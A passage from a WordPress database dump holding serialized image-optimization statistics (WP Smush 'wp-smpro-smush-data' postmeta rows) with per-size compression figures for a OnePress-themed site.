9134;s:11:\"size_before\";i:23762;s:10:\"size_after\";i:14628;s:4:\"time\";d:0.200000000000000011102230246251565404236316680908203125;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:32.2000000000000028421709430404007434844970703125;s:5:\"bytes\";i:15597;s:11:\"size_before\";i:48442;s:10:\"size_after\";i:32845;s:4:\"time\";d:0.340000000000000024424906541753443889319896697998046875;}s:5:\"large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:27.760000000000001563194018672220408916473388671875;s:5:\"bytes\";i:9987;s:11:\"size_before\";i:35978;s:10:\"size_after\";i:25991;s:4:\"time\";d:0.39000000000000001332267629550187848508358001708984375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:38.22999999999999687361196265555918216705322265625;s:5:\"bytes\";i:7866;s:11:\"size_before\";i:20577;s:10:\"size_after\";i:12711;s:4:\"time\";d:0.14000000000000001332267629550187848508358001708984375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:42.8299999999999982946974341757595539093017578125;s:5:\"bytes\";i:13592;s:11:\"size_before\";i:31735;s:10:\"size_after\";i:18143;s:4:\"time\";d:0.179999999999999993338661852249060757458209991455078125;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:37.969999999999998863131622783839702606201171875;s:5:\"bytes\";i:13968;s:11:\"size_before\";i:36791;s:10:\"size_after\";i:22823;s:4:\"time\";d:0.190000000000000002220446049250313080847263336181640625;}}}'),(4383,1720,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:19.153517993100773963988103787414729595184326171875;s:5:\"bytes\";i:18767;s:11:\"size_before\";i:97982;s:10:\"size_after\";i:79215;s:4:\"time\";d:0.11999999999999999555910790149937383830547332763671875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:7:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:10.7400000000000002131628207280300557613372802734375;s:5:\"bytes\";i:423;s:11:\"size_before\";i:3937;s:10:\"size_after\";i:3514;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:12.9199999999999999289457264239899814128875732421875;s:5:\"bytes\";i:864;s:11:\"size_before\";i:6687;s:10:\"size_after\";i:5823;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:20.730000000000000426325641456060111522674560546875;s:5:\"bytes\";i:4342;s:11:\"size_before\";i:20941;s:10:\"size_after\";i:16599;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:5:\"large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:24.059999999999998721023075631819665431976318359375;s:5:\"bytes\";i:7594;s:11:\"size_before\";i:31569;s:10:\"size_after\";i:23975;s:4:\"time\";d:0.040000000000000000832667268468867405317723751068115234375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:11.3499999999999996447286321199499070644378662109375;s:5:\"bytes\";i:718;s:11:\"size_before\";i:6324;s:10:\"size_after\";i:5606;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:15.7799999999999993605115378159098327159881591796875;s:5:\"bytes\";i:1833;s:11:\"size_before\";i:11615;s:10:\"size_after\";i:9782;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:17.699999999999999289457264239899814128875732421875;s:5:\"bytes\";i:2993;s:11:\"size_before\";i:16909;s:10:\"size_after\";i:13916;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}}}'),(4384,1719,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:19.674931861995613502358537516556680202484130859375;s:5:\"bytes\";i:29597;s:11:\"size_before\";i:150430;s:10:\"size_after\";i:120833;s:4:\"time\";d:0.11000000000000000055511151231257827021181583404541015625;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:7:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:13.449999999999999289457264239899814128875732421875;s:5:\"bytes\";i:756;s:11:\"size_before\";i:5621;s:10:\"size_after\";i:4865;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:15.910000000000000142108547152020037174224853515625;s:5:\"bytes\";i:1600;s:11:\"size_before\";i:10057;s:10:\"size_after\";i:8457;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:20.620000000000000994759830064140260219573974609375;s:5:\"bytes\";i:6767;s:11:\"size_before\";i:32823;s:10:\"size_after\";i:26056;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:5:\"large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:22.519999999999999573674358543939888477325439453125;s:5:\"bytes\";i:10679;s:11:\"size_before\";i:47422;s:10:\"size_after\";i:36743;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:15.5999999999999996447286321199499070644378662109375;s:5:\"bytes\";i:1525;s:11:\"size_before\";i:9778;s:10:\"size_after\";i:8253;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:17.82000000000000028421709430404007434844970703125;s:5:\"bytes\";i:3295;s:11:\"size_before\";i:18489;s:10:\"size_after\";i:15194;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:18.96000000000000085265128291212022304534912109375;s:5:\"bytes\";i:4975;s:11:\"size_before\";i:26240;s:10:\"size_after\";i:21265;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}}}'),(4385,1718,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:19.547860042131222968464498990215361118316650390625;s:5:\"bytes\";i:19023;s:11:\"size_before\";i:97315;s:10:\"size_after\";i:78292;s:4:\"time\";d:0.11000000000000000055511151231257827021181583404541015625;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:7:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:12.3699999999999992184029906638897955417633056640625;s:5:\"bytes\";i:444;s:11:\"size_before\";i:3588;s:10:\"size_after\";i:3144;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:14.0299999999999993605115378159098327159881591796875;s:5:\"bytes\";i:923;s:11:\"size_before\";i:6581;s:10:\"size_after\";i:5658;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:20.67999999999999971578290569595992565155029296875;s:5:\"bytes\";i:4365;s:11:\"size_before\";i:21103;s:10:\"size_after\";i:16738;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:5:\"large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:23.980000000000000426325641456060111522674560546875;s:5:\"bytes\";i:7485;s:11:\"size_before\";i:31211;s:10:\"size_after\";i:23726;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:12.8900000000000005684341886080801486968994140625;s:5:\"bytes\";i:794;s:11:\"size_before\";i:6160;s:10:\"size_after\";i:5366;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:16.809999999999998721023075631819665431976318359375;s:5:\"bytes\";i:1956;s:11:\"size_before\";i:11633;s:10:\"size_after\";i:9677;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:17.940000000000001278976924368180334568023681640625;s:5:\"bytes\";i:3056;s:11:\"size_before\";i:17039;s:10:\"size_after\";i:13983;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}}}'),(4386,1717,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:8.175239062593970373882257263176143169403076171875;s:5:\"bytes\";i:12234;s:11:\"size_before\";i:149647;s:10:\"size_after\";i:137413;s:4:\"time\";d:0.83999999999999996891375531049561686813831329345703125;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:7:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:12.25;s:5:\"bytes\";i:421;s:11:\"size_before\";i:3438;s:10:\"size_after\";i:3017;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:9.230000000000000426325641456060111522674560546875;s:5:\"bytes\";i:808;s:11:\"size_before\";i:8757;s:10:\"size_after\";i:7949;s:4:\"time\";d:0.040000000000000000832667268468867405317723751068115234375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:8.9199999999999999289457264239899814128875732421875;s:5:\"bytes\";i:3156;s:11:\"size_before\";i:35397;s:10:\"size_after\";i:32241;s:4:\"time\";d:0.179999999999999993338661852249060757458209991455078125;}s:5:\"large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.0800000000000000710542735760100185871124267578125;s:5:\"bytes\";i:2514;s:11:\"size_before\";i:49452;s:10:\"size_after\";i:46938;s:4:\"time\";d:0.34999999999999997779553950749686919152736663818359375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.9000000000000003552713678800500929355621337890625;s:5:\"bytes\";i:672;s:11:\"size_before\";i:8502;s:10:\"size_after\";i:7830;s:4:\"time\";d:0.040000000000000000832667268468867405317723751068115234375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:11.0099999999999997868371792719699442386627197265625;s:5:\"bytes\";i:1916;s:11:\"size_before\";i:17396;s:10:\"size_after\";i:15480;s:4:\"time\";d:0.08000000000000000166533453693773481063544750213623046875;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:10.28999999999999914734871708787977695465087890625;s:5:\"bytes\";i:2747;s:11:\"size_before\";i:26705;s:10:\"size_after\";i:23958;s:4:\"time\";d:0.11999999999999999555910790149937383830547332763671875;}}}'),(4387,1716,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:19.13347154351152568096949835307896137237548828125;s:5:\"bytes\";i:15505;s:11:\"size_before\";i:81036;s:10:\"size_after\";i:65531;s:4:\"time\";d:0.14000000000000001332267629550187848508358001708984375;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:7:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:8.8599999999999994315658113919198513031005859375;s:5:\"bytes\";i:313;s:11:\"size_before\";i:3532;s:10:\"size_after\";i:3219;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:11.699999999999999289457264239899814128875732421875;s:5:\"bytes\";i:656;s:11:\"size_before\";i:5609;s:10:\"size_after\";i:4953;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:20.949999999999999289457264239899814128875732421875;s:5:\"bytes\";i:3598;s:11:\"size_before\";i:17173;s:10:\"size_after\";i:13575;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:5:\"large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:24.60000000000000142108547152020037174224853515625;s:5:\"bytes\";i:6458;s:11:\"size_before\";i:26249;s:10:\"size_after\";i:19791;s:4:\"time\";d:0.070000000000000006661338147750939242541790008544921875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:10.199999999999999289457264239899814128875732421875;s:5:\"bytes\";i:524;s:11:\"size_before\";i:5137;s:10:\"size_after\";i:4613;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:15.1400000000000005684341886080801486968994140625;s:5:\"bytes\";i:1425;s:11:\"size_before\";i:9410;s:10:\"size_after\";i:7985;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:18.1700000000000017053025658242404460906982421875;s:5:\"bytes\";i:2531;s:11:\"size_before\";i:13926;s:10:\"size_after\";i:11395;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}}}'),(4388,1715,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:22.39024241624097300018547684885561466217041015625;s:5:\"bytes\";i:22047;s:11:\"size_before\";i:98467;s:10:\"size_after\";i:76420;s:4:\"time\";d:0.08999999999999998279154311831007362343370914459228515625;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:7:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:15.980000000000000426325641456060111522674560546875;s:5:\"bytes\";i:605;s:11:\"size_before\";i:3787;s:10:\"size_after\";i:3182;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:16.75;s:5:\"bytes\";i:1209;s:11:\"size_before\";i:7218;s:10:\"size_after\";i:6009;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:23.519999999999999573674358543939888477325439453125;s:5:\"bytes\";i:4921;s:11:\"size_before\";i:20925;s:10:\"size_after\";i:16004;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:5:\"large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:27.559999999999998721023075631819665431976318359375;s:5:\"bytes\";i:8431;s:11:\"size_before\";i:30595;s:10:\"size_after\";i:22164;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:15.1699999999999999289457264239899814128875732421875;s:5:\"bytes\";i:1027;s:11:\"size_before\";i:6771;s:10:\"size_after\";i:5744;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:18.64999999999999857891452847979962825775146484375;s:5:\"bytes\";i:2230;s:11:\"size_before\";i:11957;s:10:\"size_after\";i:9727;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:21.050000000000000710542735760100185871124267578125;s:5:\"bytes\";i:3624;s:11:\"size_before\";i:17214;s:10:\"size_after\";i:13590;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}}}'),(4389,1714,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:14.99904214559386872451796079985797405242919921875;s:5:\"bytes\";i:15659;s:11:\"size_before\";i:104400;s:10:\"size_after\";i:88741;s:4:\"time\";d:0.11000000000000000055511151231257827021181583404541015625;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:7:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:9.03999999999999914734871708787977695465087890625;s:5:\"bytes\";i:401;s:11:\"size_before\";i:4436;s:10:\"size_after\";i:4035;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:10.9700000000000006394884621840901672840118408203125;s:5:\"bytes\";i:755;s:11:\"size_before\";i:6882;s:10:\"size_after\";i:6127;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:15.8100000000000004973799150320701301097869873046875;s:5:\"bytes\";i:3561;s:11:\"size_before\";i:22523;s:10:\"size_after\";i:18962;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:5:\"large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:18.3599999999999994315658113919198513031005859375;s:5:\"bytes\";i:6313;s:11:\"size_before\";i:34379;s:10:\"size_after\";i:28066;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:9.8800000000000007815970093361102044582366943359375;s:5:\"bytes\";i:629;s:11:\"size_before\";i:6368;s:10:\"size_after\";i:5739;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:12.8900000000000005684341886080801486968994140625;s:5:\"bytes\";i:1536;s:11:\"size_before\";i:11918;s:10:\"size_after\";i:10382;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:13.769999999999999573674358543939888477325439453125;s:5:\"bytes\";i:2464;s:11:\"size_before\";i:17894;s:10:\"size_after\";i:15430;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}}}'),(4390,1713,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:23.2112335323042913159952149726450443267822265625;s:5:\"bytes\";i:17654;s:11:\"size_before\";i:76058;s:10:\"size_after\";i:58404;s:4:\"time\";d:0.11999999999999999555910790149937383830547332763671875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:7:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:13.8499999999999996447286321199499070644378662109375;s:5:\"bytes\";i:404;s:11:\"size_before\";i:2918;s:10:\"size_after\";i:2514;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:16.879999999999999005240169935859739780426025390625;s:5:\"bytes\";i:831;s:11:\"size_before\";i:4923;s:10:\"size_after\";i:4092;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:24.6099999999999994315658113919198513031005859375;s:5:\"bytes\";i:4070;s:11:\"size_before\";i:16535;s:10:\"size_after\";i:12465;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:5:\"large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:28.4200000000000017053025658242404460906982421875;s:5:\"bytes\";i:7087;s:11:\"size_before\";i:24940;s:10:\"size_after\";i:17853;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:15.699999999999999289457264239899814128875732421875;s:5:\"bytes\";i:739;s:11:\"size_before\";i:4706;s:10:\"size_after\";i:3967;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:18.6700000000000017053025658242404460906982421875;s:5:\"bytes\";i:1651;s:11:\"size_before\";i:8844;s:10:\"size_after\";i:7193;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:21.769999999999999573674358543939888477325439453125;s:5:\"bytes\";i:2872;s:11:\"size_before\";i:13192;s:10:\"size_after\";i:10320;s:4:\"time\";d:0.040000000000000000832667268468867405317723751068115234375;}}}'),(4391,1711,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:22.08848731370652984651314909569919109344482421875;s:5:\"bytes\";i:19875;s:11:\"size_before\";i:89979;s:10:\"size_after\";i:70104;s:4:\"time\";d:0.11999999999999999555910790149937383830547332763671875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:7:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:13.1199999999999992184029906638897955417633056640625;s:5:\"bytes\";i:495;s:11:\"size_before\";i:3773;s:10:\"size_after\";i:3278;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:15.730000000000000426325641456060111522674560546875;s:5:\"bytes\";i:898;s:11:\"size_before\";i:5710;s:10:\"size_after\";i:4812;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:23.67999999999999971578290569595992565155029296875;s:5:\"bytes\";i:4652;s:11:\"size_before\";i:19645;s:10:\"size_after\";i:14993;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:5:\"large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:26.6400000000000005684341886080801486968994140625;s:5:\"bytes\";i:7764;s:11:\"size_before\";i:29147;s:10:\"size_after\";i:21383;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:13.769999999999999573674358543939888477325439453125;s:5:\"bytes\";i:770;s:11:\"size_before\";i:5591;s:10:\"size_after\";i:4821;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:18.64999999999999857891452847979962825775146484375;s:5:\"bytes\";i:1987;s:11:\"size_before\";i:10657;s:10:\"size_after\";i:8670;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:21.410000000000000142108547152020037174224853515625;s:5:\"bytes\";i:3309;s:11:\"size_before\";i:15456;s:10:\"size_after\";i:12147;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}}}'),(4392,1710,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:17.190301160775987909801187925040721893310546875;s:5:\"bytes\";i:17164;s:11:\"size_before\";i:99847;s:10:\"size_after\";i:82683;s:4:\"time\";d:0.11000000000000000055511151231257827021181583404541015625;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:7:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:11.4900000000000002131628207280300557613372802734375;s:5:\"bytes\";i:428;s:11:\"size_before\";i:3725;s:10:\"size_after\";i:3297;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:11.9399999999999995026200849679298698902130126953125;s:5:\"bytes\";i:862;s:11:\"size_before\";i:7217;s:10:\"size_after\";i:6355;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:18.39999999999999857891452847979962825775146484375;s:5:\"bytes\";i:3897;s:11:\"size_before\";i:21184;s:10:\"size_after\";i:17287;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}s:5:\"large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:21.260000000000001563194018672220408916473388671875;s:5:\"bytes\";i:6678;s:11:\"size_before\";i:31416;s:10:\"size_after\";i:24738;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:11.6699999999999999289457264239899814128875732421875;s:5:\"bytes\";i:807;s:11:\"size_before\";i:6917;s:10:\"size_after\";i:6110;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:14.2200000000000006394884621840901672840118408203125;s:5:\"bytes\";i:1723;s:11:\"size_before\";i:12119;s:10:\"size_after\";i:10396;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:16.030000000000001136868377216160297393798828125;s:5:\"bytes\";i:2769;s:11:\"size_before\";i:17269;s:10:\"size_after\";i:14500;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}}}'),(4393,1709,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:21.84299897206354756917789927683770656585693359375;s:5:\"bytes\";i:16787;s:11:\"size_before\";i:76853;s:10:\"size_after\";i:60066;s:4:\"time\";d:0.11000000000000000055511151231257827021181583404541015625;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:7:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:11.769999999999999573674358543939888477325439453125;s:5:\"bytes\";i:293;s:11:\"size_before\";i:2490;s:10:\"size_after\";i:2197;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:13.699999999999999289457264239899814128875732421875;s:5:\"bytes\";i:665;s:11:\"size_before\";i:4854;s:10:\"size_after\";i:4189;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:23.410000000000000142108547152020037174224853515625;s:5:\"bytes\";i:3855;s:11:\"size_before\";i:16469;s:10:\"size_after\";i:12614;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:5:\"large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:27.32000000000000028421709430404007434844970703125;s:5:\"bytes\";i:7192;s:11:\"size_before\";i:26323;s:10:\"size_after\";i:19131;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:13.019999999999999573674358543939888477325439453125;s:5:\"bytes\";i:593;s:11:\"size_before\";i:4553;s:10:\"size_after\";i:3960;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:17.269999999999999573674358543939888477325439453125;s:5:\"bytes\";i:1536;s:11:\"size_before\";i:8895;s:10:\"size_after\";i:7359;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:19.989999999999998436805981327779591083526611328125;s:5:\"bytes\";i:2653;s:11:\"size_before\";i:13269;s:10:\"size_after\";i:10616;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}}}'),(4394,1708,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:18.98556180521723746323914383538067340850830078125;s:5:\"bytes\";i:17147;s:11:\"size_before\";i:90316;s:10:\"size_after\";i:73169;s:4:\"time\";d:0.12000000000000000943689570931383059360086917877197265625;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:7:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:10.949999999999999289457264239899814128875732421875;s:5:\"bytes\";i:368;s:11:\"size_before\";i:3362;s:10:\"size_after\";i:2994;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:12.9000000000000003552713678800500929355621337890625;s:5:\"bytes\";i:696;s:11:\"size_before\";i:5395;s:10:\"size_after\";i:4699;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:20.550000000000000710542735760100185871124267578125;s:5:\"bytes\";i:4050;s:11:\"size_before\";i:19710;s:10:\"size_after\";i:15660;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}s:5:\"large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:22.57000000000000028421709430404007434844970703125;s:5:\"bytes\";i:6881;s:11:\"size_before\";i:30494;s:10:\"size_after\";i:23613;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:11.839999999999999857891452847979962825775146484375;s:5:\"bytes\";i:626;s:11:\"size_before\";i:5286;s:10:\"size_after\";i:4660;s:4:\"time\";d:0.01000000000000